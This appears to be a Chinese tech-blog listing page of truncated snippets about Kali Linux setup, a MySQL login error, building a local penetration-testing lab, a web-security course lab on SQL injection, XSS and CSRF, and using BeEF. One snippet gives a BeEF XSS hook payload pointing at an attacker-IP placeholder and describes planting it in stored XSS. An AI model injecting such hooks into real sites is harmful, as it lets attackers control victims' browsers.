注意:更新系统的时候会提示个问题就是如下图: 非超级用户是否应该能够捕获数据包?,选择否就行,其实测试环境无所谓。 更新完后执行命令清理包并重启: 其他一些源: 官方介绍:https://docs.kali.org/general-use/kali-linux-sources-list-reposi ...
分类:
系统相关 时间:
2019-06-11 20:50:57
阅读次数:
1047
0X01: root@kali:~# mysql -h 192.168.7.106 -u root ERROR 1045 (28000): Access denied for user 'root'@'192.168.7.108' (using password: NO) 0X02(解决方法): m ...
分类:
数据库 时间:
2019-06-09 18:30:42
阅读次数:
149
# 本地shentou测试环境
在学习网络安全中,常常没有真实实验环境帮助自己动手提升技术能力,而本地shentou测试环境就为大家带来了便利。本地shentou测试环境:搭建于本地来进行shentou测试的环境,通常是以网站,系...
分类:
系统相关 时间:
2019-06-09 11:17:41
阅读次数:
124
KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXSS 地址: h ...
分类:
其他好文 时间:
2019-06-09 00:20:07
阅读次数:
288
Kali中Beef的安装和使用: 先打开终端输入 然后切换到beef的安装目录 然后启动beef ...
分类:
其他好文 时间:
2019-06-07 23:20:24
阅读次数:
255
近期更新源遭遇诸多不顺,无非是各种依赖问题的报错夹杂着各种稀奇古怪的问题,不过既然是玩Linux,就要做好处理各种疑难杂症的准备。经过了这几天的不断尝试,今天终于解决了更新出错的问题。 本人更新源出现的问题为:“输入sudo apt-get update”出现apt-transport-https相 ...
分类:
其他好文 时间:
2019-06-07 10:34:11
阅读次数:
332
概述: -OS: Kali-Rolling (2019.2) -DE: XFCE -WM: Arc-Dark -WM Theme: Arc-Dark -Icons: Korla -Term Font: Nimbus Mono L -Dock: Plank w/MacOS MJV Night Them ...
分类:
系统相关 时间:
2019-05-27 16:28:24
阅读次数:
165
2018 2019 2 网络对抗技术 20165216 Exp9 Web安全基础 1.1.实验内容概述 本实践的目标理解常用网络攻击技术的基本原理,做不少于7个题目,共3.5分。包括(SQL,XSS,CSRF)。Webgoat实践下相关实验。 1.2.实验环境 Kali Linux 64bit(IP ...
分类:
Web程序 时间:
2019-05-26 18:28:08
阅读次数:
219
1.实验后回答问题 (1)SQL注入攻击原理,如何防御 原理:通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 防御:对输入的数据进行限制,非法字符不能输入 (2)XSS攻击的原理,如何防御 原理:它允许恶意web用户将代码植入到提供给其 ...
分类:
Web程序 时间:
2019-05-26 13:05:50
阅读次数:
138
kalilinux安全***测试搭建***测试环境许多提供安全服务的机构会使用一些术语,如安全审计、网络或风险评估、以及***测试。这些术语在含义上有一些重叠,从定义上来看,审计是对系统或应用的量化的技术评估。安全评估意为对风险的评测,是指用以系统、应用和过程中存在的漏洞的服务。***测试的含义则不只是评估、它会用以发现的漏洞来进行测试,以验证该漏洞是否真的存在。什么是***测试***测试并没有一个标准的定义
分类:
系统相关 时间:
2019-05-25 21:35:20
阅读次数:
198
